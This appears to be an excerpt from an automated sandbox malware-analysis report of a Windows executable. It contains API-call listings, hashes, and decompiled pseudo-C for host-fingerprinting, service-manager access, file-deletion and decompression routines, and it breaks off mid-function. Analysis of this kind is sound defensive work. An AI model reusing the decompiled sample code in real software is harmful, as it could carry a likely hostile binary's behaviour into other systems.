                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(00416C50,00416840,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteManagerMappingModuleMultiOpenServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: @hA
                  • API String ID: 260064074-589612155
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C493() {
                  				short _v524;
                  				int _t7;
                  				intOrPtr* _t8;
                  				int _t10;
                  
                  				_t7 = GetWindowsDirectoryW( &_v524, 0x104);
                  				if(_t7 != 0) {
                  					_t8 =  &_v524;
                  					if(_v524 == 0) {
                  						L6:
                  						_t10 = GetVolumeInformationW( &_v524, 0, 0, 0x415488, 0, 0, 0, 0); // executed
                  						return _t10;
                  					}
                  					while( *_t8 != 0x5c) {
                  						_t8 = _t8 + 2;
                  						if( *_t8 != 0) {
                  							continue;
                  						}
                  						goto L6;
                  					}
                  					 *((short*)(_t8 + 2)) = 0;
                  					goto L6;
                  				}
                  				return _t7;
                  			}








                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction ID: 6df482a4064c3c314c9bc21c7ed919fd71dc62a834def3a9c54a892a1779e89a
                  • Opcode Fuzzy Hash: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction Fuzzy Hash: 41F0B461840304EADB60AB609C99EF7727CFB90701F04C2BBE446A31A0EA748EC04669
                  Uniqueness

                  Uniqueness Score: 0.11%

                  C-Code - Quality: 100%
                  			E0040F16B() {
                  				void* _t1;
                  				int _t2;
                  
                  				_t1 = OpenSCManagerW(0, 0, 0xf003f); // executed
                  				if(_t1 != 0) {
                  					 *0x415f4c = 1; // executed
                  					_t2 = CloseServiceHandle(_t1); // executed
                  					return _t2;
                  				}
                  				return _t1;
                  			}






                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                  • CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction ID: 2df2e35fa660732f6bf37a98dc022a26ca5b34ae0ab37706f3e31856a2e9695e
                  • Opcode Fuzzy Hash: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction Fuzzy Hash: 36C04CB0340301AEEB749F51DE09BA53998AB44B42F008074A60DE95D5CBF44406DA2D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID:
                  • API String ID: 1514166925-0
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Non-executed Functions

                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
                  				signed int _v8;
                  				signed int _v12;
                  				void* _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				void* _v32;
                  				void* _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				signed int _v48;
                  				signed int _v52;
                  				signed char _v56;
                  				intOrPtr _v60;
                  				int* _v64;
                  				signed int _v68;
                  				int _v72;
                  				void* _v76;
                  				intOrPtr _v80;
                  				signed int _v144;
                  				signed int _v148;
                  				void _v212;
                  				signed int _t759;
                  				signed int* _t763;
                  				void* _t764;
                  				signed int _t769;
                  				signed int _t770;
                  				intOrPtr _t771;
                  				int _t772;
                  				signed int _t774;
                  				void* _t775;
                  				signed int _t782;
                  				void* _t785;
                  				signed int* _t786;
                  				void* _t792;
                  				intOrPtr _t795;
                  				signed char* _t813;
                  				intOrPtr _t815;
                  				void* _t816;
                  				signed int _t819;
                  				intOrPtr _t822;
                  				signed int _t823;
                  				signed int _t828;
                  				signed int _t830;
                  				signed int _t834;
                  				unsigned int _t836;
                  				signed int _t837;
                  				signed int _t841;
                  				unsigned int _t843;
                  				signed int _t846;
                  				signed int _t849;
                  				unsigned int _t850;
                  				signed int _t852;
                  				signed char _t853;
                  				signed int _t855;
                  				signed int _t864;
                  				signed int _t865;
                  				signed int _t868;
                  				signed int _t872;
                  				signed int _t873;
                  				signed int _t874;
                  				void* _t875;
                  				signed int _t879;
                  				signed int _t883;
                  				signed int _t884;
                  				signed int _t885;
                  				signed int _t889;
                  				char _t890;
                  				signed int _t894;
                  				signed int _t900;
                  				signed int _t902;
                  				signed char _t908;
                  				signed int _t910;
                  				signed int _t913;
                  				signed int _t915;
                  				signed int _t919;
                  				signed int _t920;
                  				signed int _t922;
                  				signed int _t926;
                  				signed int _t934;
                  				intOrPtr _t937;
                  				signed int _t939;
                  				signed int _t941;
                  				signed int _t948;
                  				signed int _t960;
                  				signed int _t962;
                  				signed char _t968;
                  				signed int _t970;
                  				signed int _t972;
                  				intOrPtr _t988;
                  				signed int _t989;
                  				void* _t999;
                  				signed int _t1004;
                  				signed int _t1008;
                  				signed int _t1009;
                  				signed int _t1011;
                  				signed int _t1014;
                  				signed int _t1019;
                  				signed int _t1029;
                  				signed int _t1031;
                  				signed char _t1037;
                  				signed int _t1039;
                  				signed int _t1041;
                  				signed int _t1044;
                  				signed int _t1046;
                  				signed int _t1051;
                  				signed int _t1060;
                  				signed int _t1066;
                  				int _t1067;
                  				signed int _t1075;
                  				signed int _t1077;
                  				signed int _t1078;
                  				signed int _t1079;
                  				signed int _t1080;
                  				signed int _t1082;
                  				signed int _t1083;
                  				signed int _t1084;
                  				signed int _t1085;
                  				signed int _t1087;
                  				signed int _t1088;
                  				signed int _t1090;
                  				signed int _t1091;
                  				signed int _t1093;
                  				signed int _t1094;
                  				signed int _t1095;
                  				signed int _t1096;
                  				signed int _t1112;
                  				signed int _t1113;
                  				void* _t1114;
                  				intOrPtr _t1115;
                  				signed char* _t1116;
                  				signed int _t1117;
                  				signed int _t1118;
                  				signed int _t1119;
                  				signed int _t1121;
                  				signed int _t1123;
                  				signed int _t1124;
                  				signed int _t1126;
                  				signed int _t1127;
                  				signed char _t1128;
                  				signed int _t1135;
                  				signed int _t1137;
                  				signed int _t1138;
                  				signed int* _t1139;
                  				signed int _t1141;
                  				unsigned int _t1145;
                  				signed int _t1146;
                  				void* _t1157;
                  				void* _t1158;
                  				signed char _t1161;
                  				signed int _t1163;
                  				void* _t1164;
                  				signed int _t1165;
                  				signed int _t1166;
                  				signed char _t1169;
                  				unsigned int _t1170;
                  				signed char _t1176;
                  				signed int _t1177;
                  				signed int _t1185;
                  				signed int* _t1187;
                  				signed int _t1191;
                  				signed char _t1194;
                  				signed int _t1195;
                  				void* _t1197;
                  				signed int _t1198;
                  				signed int _t1199;
                  				signed char _t1200;
                  				signed int _t1201;
                  				signed int _t1202;
                  				signed char _t1203;
                  				int _t1205;
                  				intOrPtr* _t1208;
                  				signed char _t1216;
                  				signed int _t1219;
                  				signed int* _t1221;
                  				signed int _t1222;
                  				signed char _t1229;
                  				signed int _t1232;
                  				signed char _t1233;
                  				signed char _t1234;
                  				void* _t1239;
                  				void* _t1244;
                  				intOrPtr _t1245;
                  				signed int _t1247;
                  				signed int _t1248;
                  				signed int _t1249;
                  				signed int _t1250;
                  				signed char _t1251;
                  				int _t1253;
                  				signed int _t1256;
                  				signed char _t1263;
                  				signed int _t1266;
                  				signed int _t1267;
                  				signed char _t1270;
                  				signed char _t1271;
                  				signed int _t1274;
                  				void* _t1275;
                  				signed int _t1277;
                  				signed int _t1279;
                  				void* _t1288;
                  				signed int _t1291;
                  				void* _t1296;
                  				signed int _t1299;
                  				signed int _t1301;
                  				int* _t1302;
                  				unsigned int _t1303;
                  				signed int _t1304;
                  				void* _t1305;
                  				int _t1310;
                  				signed int _t1315;
                  				signed int _t1317;
                  				signed int _t1320;
                  				unsigned int _t1321;
                  				char* _t1322;
                  				signed int _t1326;
                  				int* _t1350;
                  				signed int _t1351;
                  				signed int* _t1352;
                  				signed int _t1355;
                  				signed int _t1358;
                  				intOrPtr _t1359;
                  				void* _t1363;
                  				signed int _t1364;
                  				signed int _t1365;
                  				void* _t1366;
                  				void* _t1367;
                  				void* _t1368;
                  				void* _t1369;
                  				void* _t1370;
                  				void* _t1371;
                  				void* _t1372;
                  				signed int _t1373;
                  				int _t1374;
                  				signed int _t1375;
                  				int* _t1376;
                  				void* _t1377;
                  				void* _t1378;
                  				void* _t1379;
                  				void* _t1384;
                  				void* _t1385;
                  
                  				_t1288 = __edx;
                  				_v16 = __edx;
                  				_t1113 = _t1112 | 0xffffffff;
                  				_v76 = __edx;
                  				_t1363 = _a12;
                  				_v36 =  *_a4 + __edx;
                  				_t1350 = __ecx;
                  				_v20 = _t1113;
                  				_v64 = __ecx;
                  				_t759 =  *_a16;
                  				_v32 = _t1363;
                  				_v60 = _t759 + _t1363;
                  				_t1135 = _a20 & 0x00000004;
                  				_v52 = _t1135;
                  				if(_t1135 == 0) {
                  					_t16 = _t1363 - 1; // 0x7
                  					_t1137 = _t16 + _t759 - _a8;
                  					__eflags = _t1137;
                  					_v68 = _t1137;
                  				} else {
                  					_t1137 = _t1113;
                  					_v68 = _t1113;
                  				}
                  				_t18 = _t1137 + 1; // 0x8
                  				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
                  					 *_a16 =  *_a16 & 0x00000000;
                  					_t763 = _a4;
                  					 *_t763 =  *_t763 & 0x00000000;
                  					__eflags =  *_t763;
                  					_t764 = 0xfffffffd;
                  					return _t764;
                  				} else {
                  					_v28 = _v28 & 0x00000000;
                  					_t1364 = _t1350[1];
                  					_t1138 = _t1350[9];
                  					_v8 = _t1350[0xe];
                  					_v44 = _t1350[8];
                  					_v56 = _t1350[0xa];
                  					_v72 = _t1350[0xf];
                  					_t769 =  *_t1350;
                  					_v48 = _t1364;
                  					_v12 = _t1138;
                  					_v24 = 1;
                  					_v80 = 0x90;
                  					_t1384 = _t769 - 0x18;
                  					if(_t1384 > 0) {
                  						__eflags = _t769 - 0x25;
                  						if(__eflags > 0) {
                  							_t770 = _t769 - 0x26;
                  							__eflags = _t770;
                  							if(_t770 == 0) {
                  								_t1139 = _v32;
                  								_t771 = _v60;
                  								L59:
                  								__eflags = _t1288 - _v36;
                  								if(_t1288 >= _v36) {
                  									 *_t1350 = 0x26;
                  									L335:
                  									_t772 = _v24;
                  									L336:
                  									_t1114 = 0xfffffffc;
                  									_t1113 =  !=  ? _t772 : _t1114;
                  									L337:
                  									_v20 = _t1113;
                  									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
                  										L343:
                  										_t1350[1] = _t1364;
                  										asm("bts ecx, esi");
                  										_t774 =  >=  ? 0 : 0;
                  										_t1141 = 0 ^ _t774;
                  										_t775 =  >=  ? _t1141 : _t774;
                  										_t1350[8] = _v44;
                  										_t1350[9] = _v12;
                  										_t1350[0xa] = _v56;
                  										_t1350[0xf] = _v72;
                  										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
                  										 *_a4 = _t1288 - _v76;
                  										_t782 = _v32 - _a12;
                  										_v32 = _t782;
                  										 *_a16 = _t782;
                  										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
                  											L360:
                  											return _t1113;
                  										} else {
                  											_a4 = 0x15b0;
                  											_t1291 = _t782 % _a4;
                  											_t1145 = _t1350[7];
                  											_t1365 = _t1145 & 0x0000ffff;
                  											_t1146 = _t1145 >> 0x10;
                  											_v68 = _t1291;
                  											if(_v32 == 0) {
                  												L357:
                  												_t1350[7] = (_t1146 << 0x10) + _t1365;
                  												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
                  													_t785 = 0xfffffffe;
                  													_t1113 =  !=  ? _t785 : _t1113;
                  												}
                  												goto L360;
                  											}
                  											_t1351 = 0xfff1;
                  											do {
                  												_t786 = 0;
                  												_a16 = 0;
                  												if(_t1291 <= 7) {
                  													L351:
                  													if(_t786 >= _t1291) {
                  														goto L355;
                  													}
                  													_t1116 = _a12;
                  													_t1296 = _t1291 - _t786;
                  													do {
                  														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
                  														_t1116 =  &(_t1116[1]);
                  														_t1146 = _t1146 + _t1365;
                  														_t1296 = _t1296 - 1;
                  													} while (_t1296 != 0);
                  													_a12 = _t1116;
                  													goto L355;
                  												}
                  												_t1352 = _a16;
                  												_push(7);
                  												_t795 = 0 - _a12;
                  												_v80 = _t795;
                  												_t1115 = _t795;
                  												do {
                  													_t1352 =  &(_t1352[2]);
                  													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
                  													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
                  													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
                  													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
                  													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
                  													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
                  													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
                  													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
                  													_t813 =  &(_a12[8]);
                  													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
                  													_a12 = _t813;
                  												} while ( &(_t813[_t1115]) < _t1291);
                  												_a16 = _t1352;
                  												_t786 = _t1352;
                  												_t1351 = 0xfff1;
                  												goto L351;
                  												L355:
                  												_t1365 = _t1365 % _t1351;
                  												_t792 = _v32 - _v68;
                  												_t1146 = _t1146 % _t1351;
                  												_t1291 = _a4;
                  												_v32 = _t792;
                  												_v68 = _t1291;
                  											} while (_t792 != 0);
                  											_t1113 = _v20;
                  											_t1350 = _v64;
                  											goto L357;
                  										}
                  									} else {
                  										L339:
                  										_t815 = _v76;
                  										while(_t1288 > _t815) {
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												goto L343;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1364;
                  										}
                  										goto L343;
                  									}
                  								}
                  								_t1373 = _v12;
                  								_t816 = _t771 - _t1139;
                  								_t1157 = _v36 - _t1288;
                  								__eflags = _t816 - _t1157;
                  								_t1158 =  <  ? _t816 : _t1157;
                  								__eflags = _t1158 - _t1373;
                  								_t1374 =  <  ? _t1158 : _t1373;
                  								memcpy(_v32, _t1288, _t1374);
                  								_t1379 = _t1379 + 0xc;
                  								_t1288 = _v16 + _t1374;
                  								_t1139 = _v32 + _t1374;
                  								_t819 = _v12 - _t1374;
                  								__eflags = _t819;
                  								_v16 = _t1288;
                  								_t1364 = _v48;
                  								_v32 = _t1139;
                  								_v12 = _t819;
                  								L61:
                  								__eflags = _t819;
                  								if(_t819 != 0) {
                  									L279:
                  									_t771 = _v60;
                  									__eflags = _t1139 - _t771;
                  									if(_t1139 < _t771) {
                  										goto L59;
                  									}
                  									_t1113 = 2;
                  									_v20 = _t1113;
                  									 *_t1350 = 9;
                  									goto L339;
                  								}
                  								L62:
                  								__eflags = _t1350[5] & 0x00000001;
                  								if((_t1350[5] & 0x00000001) != 0) {
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 >= (_t1364 & 0x00000007)) {
                  										_t1117 = _v8;
                  										L311:
                  										_t822 = _v76;
                  										_t1161 = _t1364 & 0x00000007;
                  										_t1118 = _t1117 >> _t1161;
                  										_t1364 = _t1364 - _t1161;
                  										__eflags = _t1288 - _t822;
                  										if(_t1288 <= _t822) {
                  											L315:
                  											_t823 = _t1364;
                  											asm("bts edx, eax");
                  											__eflags = _t823 - 0x20;
                  											_t1163 =  >=  ? 0 : 0;
                  											_t1299 = 0 ^ _t1163;
                  											__eflags = _t823 - 0x40;
                  											_t1164 =  >=  ? _t1299 : _t1163;
                  											_t1119 = _t1118 & _t1299 - 0x00000001;
                  											__eflags = _a20 & 0x00000001;
                  											_v8 = _t1119;
                  											if((_a20 & 0x00000001) == 0) {
                  												L332:
                  												_t1288 = _v16;
                  												L333:
                  												_t1113 = 0;
                  												 *_t1350 = 0x22;
                  												L18:
                  												_t772 = _v24;
                  												goto L337;
                  											}
                  											_t1165 = 0;
                  											__eflags = 0;
                  											L317:
                  											_v12 = _t1165;
                  											__eflags = _t1165 - 4;
                  											if(_t1165 >= 4) {
                  												goto L332;
                  											}
                  											__eflags = _t1364;
                  											if(_t1364 == 0) {
                  												_t1288 = _v16;
                  												L327:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													 *_t1350 = 0x2a;
                  													goto L335;
                  												}
                  												_t1166 =  *_t1288 & 0x000000ff;
                  												_t1301 = _t1288 + 1;
                  												__eflags = _t1301;
                  												_v16 = _t1301;
                  												L329:
                  												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
                  												_t1165 = _v12 + 1;
                  												goto L317;
                  											}
                  											__eflags = _t1364 - 8;
                  											if(_t1364 >= 8) {
                  												L324:
                  												_t1166 = _t1119 & 0x000000ff;
                  												_t1119 = _t1119 >> 8;
                  												_t1364 = _t1364 - 8;
                  												_v8 = _t1119;
                  												goto L329;
                  											}
                  											_t1288 = _v16;
                  											while(1) {
                  												L322:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													break;
                  												}
                  												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
                  												_t1288 = _t1288 + 1;
                  												_t1119 = _t1119 | _t828;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 8;
                  												_v8 = _t1119;
                  												__eflags = _t1364 - 8;
                  												if(_t1364 < 8) {
                  													continue;
                  												}
                  												goto L324;
                  											}
                  											 *_t1350 = 0x29;
                  											goto L335;
                  										} else {
                  											goto L312;
                  										}
                  										while(1) {
                  											L312:
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												break;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1288 - _t822;
                  											if(_t1288 > _t822) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_v16 = _t1288;
                  										goto L315;
                  									} else {
                  										goto L306;
                  									}
                  									while(1) {
                  										L306:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t1169 = _t1364;
                  										_t1364 = _t1364 + 8;
                  										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
                  										_t1288 = _t1288 + 1;
                  										_t1117 = _v8 | _t830;
                  										_v16 = _t1288;
                  										_v8 = _t1117;
                  										__eflags = _t1364 - (_t1364 & 0x00000007);
                  										if(_t1364 < (_t1364 & 0x00000007)) {
                  											continue;
                  										}
                  										goto L311;
                  									}
                  									 *_t1350 = 0x20;
                  									goto L335;
                  								}
                  								L63:
                  								_t1170 = _v8;
                  								L66:
                  								__eflags = _t1364 - 3;
                  								if(_t1364 < 3) {
                  									L64:
                  									__eflags = _t1288 - _v36;
                  									if(_t1288 >= _v36) {
                  										 *_t1350 = 3;
                  										goto L335;
                  									}
                  									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
                  									_t1288 = _t1288 + 1;
                  									_t1170 = _v8 | _t834;
                  									_v16 = _t1288;
                  									_v8 = _t1170;
                  									_t1364 = _t1364 + 8;
                  									__eflags = _t1364;
                  									goto L66;
                  								}
                  								_t1364 = _t1364 - 3;
                  								_t836 = _t1170 & 0x00000007;
                  								_t1350[5] = _t836;
                  								_t837 = _t836 >> 1;
                  								__eflags = _t837;
                  								_v8 = _t1170 >> 3;
                  								_v48 = _t1364;
                  								_t1350[6] = _t837;
                  								if(_t837 == 0) {
                  									L253:
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 < (_t1364 & 0x00000007)) {
                  										L251:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 5;
                  											goto L335;
                  										}
                  										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t841;
                  										_t1364 = _t1364 + 8;
                  										__eflags = _t1364;
                  										_v16 = _t1288;
                  										goto L253;
                  									}
                  									_t1176 = _t1364 & 0x00000007;
                  									_t843 = _v8 >> _t1176;
                  									_t1364 = _t1364 - _t1176;
                  									_v8 = _t843;
                  									_t1177 = 0;
                  									__eflags = 0;
                  									_v48 = _t1364;
                  									L255:
                  									_v12 = _t1177;
                  									__eflags = _t1177 - 4;
                  									if(_t1177 >= 4) {
                  										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
                  										_t819 = _v12;
                  										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
                  										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
                  											L304:
                  											_v20 = _t1113;
                  											 *_t1350 = 0x27;
                  											goto L339;
                  										}
                  										_t1139 = _v32;
                  										L267:
                  										__eflags = _t819;
                  										if(_t819 == 0) {
                  											goto L62;
                  										}
                  										__eflags = _t1364;
                  										if(_t1364 == 0) {
                  											goto L61;
                  										}
                  										__eflags = _t1364 - 8;
                  										if(_t1364 >= 8) {
                  											_t1185 = _v8;
                  											L274:
                  											_t846 = _t1185 & 0x000000ff;
                  											_t1364 = _t1364 - 8;
                  											_v44 = _t846;
                  											_v8 = _t1185 >> 8;
                  											_v48 = _t1364;
                  											L276:
                  											_t1187 = _v32;
                  											__eflags = _t1187 - _v60;
                  											if(_t1187 >= _v60) {
                  												_t1113 = 2;
                  												_v20 = _t1113;
                  												 *_t1350 = 0x34;
                  												goto L339;
                  											}
                  											 *_t1187 = _t846;
                  											_t1139 =  &(_t1187[0]);
                  											_t819 = _v12 - 1;
                  											_v32 = _t1139;
                  											_v12 = _t819;
                  											goto L267;
                  										} else {
                  											goto L270;
                  										}
                  										while(1) {
                  											L270:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												break;
                  											}
                  											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_t1364 = _t1364 + 8;
                  											_t1185 = _v8 | _t849;
                  											_v16 = _t1288;
                  											_v8 = _t1185;
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												continue;
                  											}
                  											goto L274;
                  										}
                  										 *_t1350 = 0x33;
                  										goto L335;
                  									}
                  									__eflags = _t1364;
                  									if(_t1364 == 0) {
                  										L262:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 7;
                  											goto L335;
                  										}
                  										_t850 =  *_t1288;
                  										_t1288 = _t1288 + 1;
                  										__eflags = _t1288;
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
                  										_t843 = _v8;
                  										_v16 = _t1288;
                  										L264:
                  										_t1177 = _t1177 + 1;
                  										goto L255;
                  									}
                  									__eflags = _t1364 - 8;
                  									if(_t1364 >= 8) {
                  										L261:
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
                  										_t843 = _t843 >> 8;
                  										_t1364 = _t1364 - 8;
                  										_v8 = _t843;
                  										_v48 = _t1364;
                  										goto L264;
                  									} else {
                  										goto L258;
                  									}
                  									while(1) {
                  										L258:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t852;
                  										_t1364 = _t1364 + 8;
                  										_v16 = _t1288;
                  										__eflags = _t1364 - 8;
                  										if(_t1364 < 8) {
                  											continue;
                  										}
                  										_t1177 = _v12;
                  										_t843 = _v8;
                  										goto L261;
                  									}
                  									 *_t1350 = 6;
                  									goto L335;
                  								}
                  								__eflags = _t837 - 3;
                  								if(_t837 == 3) {
                  									L298:
                  									_v20 = _t1113;
                  									 *_t1350 = 0xa;
                  									goto L339;
                  								}
                  								__eflags = _t837 - _v24;
                  								if(_t837 != _v24) {
                  									_t1191 = 0;
                  									__eflags = 0;
                  									L72:
                  									_v12 = _t1191;
                  									__eflags = _t1191 - 3;
                  									if(_t1191 < 3) {
                  										L83:
                  										_t146 = _t1191 + 0x411014; // 0x40505
                  										_t853 =  *_t146;
                  										_v28 = _t853;
                  										__eflags = _t1364 - _t853;
                  										if(_t1364 < _t853) {
                  											L81:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												 *_t1350 = 0xb;
                  												goto L335;
                  											}
                  											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_v8 = _v8 | _t855;
                  											_t1364 = _t1364 + 8;
                  											__eflags = _t1364;
                  											_t1191 = _v12;
                  											_v16 = _t1288;
                  											goto L83;
                  										}
                  										_t1302 =  &(_t1350[_t1191]);
                  										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
                  										_t155 = _v12 + 0x411014; // 0x40505
                  										_t1194 =  *_t155;
                  										_v8 = _v8 >> _t1194;
                  										_t1364 = _t1364 - _t1194;
                  										_t1195 = _v12;
                  										_v48 = _t1364;
                  										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
                  										_t1191 = _t1195 + 1;
                  										_t1288 = _v16;
